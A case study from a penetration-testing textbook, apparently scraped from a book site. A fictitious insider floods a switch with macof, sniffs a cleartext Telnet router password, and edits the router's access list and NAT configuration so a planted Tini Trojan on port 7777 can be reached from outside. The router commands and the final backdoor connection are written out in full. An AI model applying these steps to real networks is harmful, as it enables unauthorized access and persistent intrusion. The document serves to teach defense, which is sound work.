Case Study

 < Day Day Up > 

In this case study, Evil Jimmy is a contractor for a fictitious company called Little Company Network (LCN). At LCN, Evil Jimmy wants to be able to access the network from home. He has installed the Trojan Tini on a server that operates on TCP port 7777, but the router is not allowing traffic on that port to pass through into the network. Evil Jimmy realizes that he must gain access to the router and change the ACL so that port 7777 is allowed through the router. Also, he must configure a static NAT configuration so that he can access his PC from outside the LCN network. Figure 10-8 shows a network diagram of the LCN network.

Figure 10-8. LCN Network


Note

For more on Tini and other Trojans, see Chapter 12, "Using Trojans and Backdoor Applications."


Evil Jimmy knows that to gain access to the router, he must get the password. He knows that the network administrator frequently Telnets into the router. Because Telnet is sent clear text, all Evil Jimmy has to do is sniff the traffic to see the password.

Unfortunately for Evil Jimmy, he cannot just turn on a network monitor application and capture the password because a switch is in use. To see the traffic going to the router, he first floods the switch with MAC addresses. By filling up the MAC table, he forces the switch to send traffic out all ports. With traffic being sent out all ports, Evil Jimmy can sniff the Telnet traffic going to the router.

Evil Jimmy launches macof from a Linux command line to flood the switch with MAC addresses. Figure 10-9 shows macof in action as thousands of MAC addresses are sent to the switch.

Figure 10-9. Macof Flooding


Now Evil Jimmy sits back and monitors the traffic using Ethereal, a free network monitor utility. After a while, he notices Telnet traffic to the router (192.168.100.12). Ethereal reveals the output shown in Figure 10-10, which shows the Telnet password and enable password as LCN123.

Figure 10-10. LCN Network Telnet/Enable Password Compromised


Next, Evil Jimmy uses these passwords to log onto the router and examine the current access lists on the outgoing interface, serial 0, as demonstrated in Example 10-5. (Relevant portions are highlighted.)

Example 10-5. Evil Jimmy Dissects the Access Lists
  C:\telnet 192.168.100.12   Authorized Use Only   User Access Verification      Password:   LCNRouter>enable   Password:   LCNRoutershow access-lists   Standard IP access list INSIDE_LOCAL       permit 192.168.100.0   Extended IP access list 100                                      permit tcp any any eq smtp                                   permit tcp any any eq domain                                 permit tcp any any eq www                                    permit tcp any any eq 443                                    permit tcp any any eq ftp-data                               permit tcp any any eq ftp                                LCNRouter#show ip interface serial 0   Serial0 is administratively down, line protocol is down     Internet address is 200.100.50.25/24     Broadcast address is 255.255.255.255     Address determined by setup command     MTU is 1500 bytes     Helper address is not set     Directed broadcast forwarding is disabled     Outgoing access list is not set     Inbound access list is 100                               ...<output omitted for brevity>...

Evil Jimmy sees that access-list 100 is used on the serial 0 interface to filter traffic coming inbound. He adds a line to this access list so that TCP port 7777, the port used by the Tini backdoor Trojan, is also allowed through, as demonstrated in Example 10-6.

Example 10-6. Evil Jimmy Modifies the Access List to Permit His Trojan
LCNRouter#configure terminal Enter configuration commands, one per line. End with CNTL/Z. LCNRouter(config)access-list 100 permit tcp any any eq 7777

Next, Evil Jimmy needs to change the NAT configuration. Currently, the router is using dynamic NAT to translate the entire 192.168.100.0/24 network to the global pool of 200.100.50.26 200.100.50.30. The problem that Evil Jimmy faces is that he will never know what destination address he should use at home to access his computer on the inside of the LCN network. He needs to configure a static NAT translation for his computer, while allowing dynamic NAT for the rest of the network.

First, Evil Jimmy looks at the existing configuration, as displayed in Example 10-7. (Only the relevant portions are shown.)

Example 10-7. Reconnaissance on the LCN NAT Configuration
interface Ethernet0  ip address 192.168.100.12 255.255.255.0  ip nat inside ! interface Serial0  ip address 200.100.50.25 255.255.255.0  ip access-group 100 in  ip nat outside  no fair-queue ! ip nat pool LCNPool 200.100.50.26 200.100.50.30 prefix-length 24 ip nat inside source list INSIDE_LOCAL pool LCNPool overload ip classless ip access-list standard INSIDE_LOCAL  permit 192.168.100.0

Evil Jimmy configures a static NAT translation for his computer (192.168.100.150). He makes sure to modify the existing inside source list called INSIDE_LOCAL to deny his computer; this prevents his computer from being used for dynamic NAT. He translates his inside local address to the public address of 200.100.50.26 and changes the inside global pool called LCNPool to no longer use the address of 200.100.50.26, as demonstrated in Example 10-8.

Example 10-8. Evil Jimmy Configures a Static NAT Translation to Provide Remote Access to the LCN Network
LCNRouter(config)#ip access-list standard INSIDE_LOCAL ! First remove the existing statement LCNRouter(config-std-nacl)#no permit 192.168.100.0 ! Deny Evil Jimmy's computer from being used in the dynamic NAT configuration LCNRouter(config-std-nacl)#deny host 192.168.100.150 ! Add the rest of the network again so that it will be used in the dynamic NAT configuration LCNRouter(config-std-nacl)#permit 192.168.100.0 LCNRouter(config-std-nacl)#exit ! Configure static NAT LCNRouter(config)#ip nat inside source static 192.168.100.150 200.100.50.26 ! Change the current pool to no longer use the 200.100.50.26 address LCNRouter(config)#no ip nat pool LCNPool LCNRouter(config)#ip nat pool LCNPool 200.100.50.27 200.100.50.30 prefix-length 24

Tip

This case study assumes a working knowledge of configuring Network Address Translation (NAT). For more information on configuring NAT, see the Cisco Technical Support and Documentation website on the subject at http://www.cisco.com/en/US/tech/tk648/tk361/tk438/tsd_technology_support_sub-protocol_home.html.


That night, Evil Jimmy tries to access his computer from home. From a MS-DOS command shell, he Telnets to TCP port 7777, the port used by the Tini Trojan:

C:\telnet 200.100.50.26 7777 Connecting To 200.100.50.26... C:\

It worked! A failure would have reported a Connection Failed message; instead, he is presented with a command prompt on his computer within the LCN network. Evil Jimmy has successfully created a means to remotely access the inside of the LCN network.

     < Day Day Up > 


    Penetration Testing and Network Defense
    Penetration Testing and Network Defense
    ISBN: 1587052083
    EAN: 2147483647
    Year: 2005
    Pages: 209

    flylib.com © 2008-2017.
    If you may any questions please contact us: flylib@qtcs.net